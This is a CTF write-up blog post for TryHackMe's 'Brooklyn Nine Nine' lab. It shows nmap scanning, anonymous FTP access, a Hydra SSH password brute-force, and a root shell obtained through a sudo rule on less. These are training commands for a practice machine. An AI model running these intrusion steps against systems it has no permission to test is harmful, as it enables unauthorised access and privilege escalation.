Challenges: Brooklyn Nine Nine (TryHackMe)

JebitokJebitok
3 min read

Table of contents

Welcome to Brooklyn Nine Nine, a beginner-friendly Linux CTF challenge hosted on TryHackMe. This machine focuses on basic enumeration, initial access via commonly exposed services, and privilege escalation using a well-known sudo misconfiguration. Whether you're new to CTFs or brushing up on your enumeration and privilege escalation skills, this box is a solid learning experience. Let’s dive into it with curiosity, a bit of patience, and your favorite terminal.

Deploy and get hacking

Start Machine

This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box. If you find more dm me in discord at Fsociety2006.

Answer the questions below

The first step is running an nmap scan:

nmap -sC -sV -A <IP_Address>

nmap -sC -sV <IP_Address>

21/tcp ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.6p1

80/tcp open http Apache httpd 2.4.29

find / -type f -name note_to_jake.txt 2> /dev/null

  1. User flag

    With FTP, we can check any helpful details about the users

    ftp <IP_Address>
    Name: Anonymous

    Password: (just enter - no password needed)

    ftp> ls

    ftp> get note_to_jack.txt

    Users: Jake & Amy, queue: Holt, company: nine nine

    Inspecting the site showed a hint of steganography, I tried using tools like steghide, strings, exiftool, binwalk, and steghide, but it wasn’t helpful. I wasn’t able to extract anything that would help us get the credentials of a user.

    Using Hydra and SSH helped find Jake’s password, which would be used in Remote SSH authentication.

    hydra -I -l jake -P /usr/share/wordlists/rockyou.txt ssh://<IP_Address>

    ssh jake@<IP_Addres>
    find / -type f -name user.txt 2> /dev/null

  2. Root flag

    After finding the user, we now have to look for a way to escalate privileges to the root. First, we check the Sudo -l. With these, we’ll use online resources like GTFOBins to check the commands we can use to escalate privileges. In this case, we’ll search for less and sudo on the platform.

     (ALL) NOPASSWD: /usr/bin/less

    We’ll use this command: sudo less /etc/profile which will launch with vim, use the letter v and scroll to the end or where you’ve /etc/profile and type !/bin/sh then exit with :wq then you’ll confirm Root and find the root flag

This machine walks us through several foundational skills in penetration testing: port scanning, brute-forcing services, basic file inspection, and finally, privilege escalation using less and sudo. It reinforces how crucial thorough enumeration is, and how seemingly harmless misconfigurations like giving sudo access to simple commands can lead to full system compromise. The hint “A recursive call” cleverly alludes to the ability of less to invoke a shell through nested tools like vi. Overall, a great exercise in sharpening your hacker instincts!

From anonymous FTPs to GTFOBinning our way to root—Brooklyn Nine Nine was more than just a precinct this time. It was a playground for hackers in training like me. Stay curious, take notes, and keep hacking. Nine Nine! 🚓💻

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

CTF WriteuptryhackmeftpsshnmapsudoPrivilege Escalation

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.